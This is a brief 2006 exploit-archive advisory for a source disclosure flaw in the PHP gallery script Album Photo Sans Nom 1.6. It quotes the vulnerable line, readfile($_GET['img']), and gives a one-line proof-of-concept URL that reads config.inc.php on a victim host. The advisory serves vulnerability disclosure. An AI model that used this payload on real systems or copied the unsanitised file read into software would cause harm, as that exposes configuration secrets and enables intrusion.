Album Photo Sans Nom <= 1.6 Remote Source Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Album Photo Sans Nom <= 1.6 Remote Source Disclosure Vulnerability
# Published : 2006-10-10
# Author : DarkFig
# Previous Title : Foafgen <= 0.3 (redir.php) Local Source Disclosure Vulnerability
# Next Title : vtiger CRM <= 4.2 (calpath) Multiple Remote File Include Vulnerabilities

#
# Title..: 7 php scripts File Inclusion Vuln / Source disclosure
# Credits: DarkFig
# Og.link: http://acid-root.new.fr/poc/13061007.txt
#
# Using http://www.google.com/codesearch
# Few examples about what we can do with a code search engine
# For educational purpose only.
#
# You can use regex in your research, this can be chaotic.
# What's your opinion about the google code search project ?
#

# Affected.scr: Album Photo Sans Nom v1.6
# Download....: http://scripts.bezut.info/releases/APSN/albumV1.6.tgz
# Poc.........: http://victim.pl/getimg.php?img=config.inc.php
# Vuln.code...: Line 47, readfile($_GET['img']);

# www.Syue.com [2006-10-10]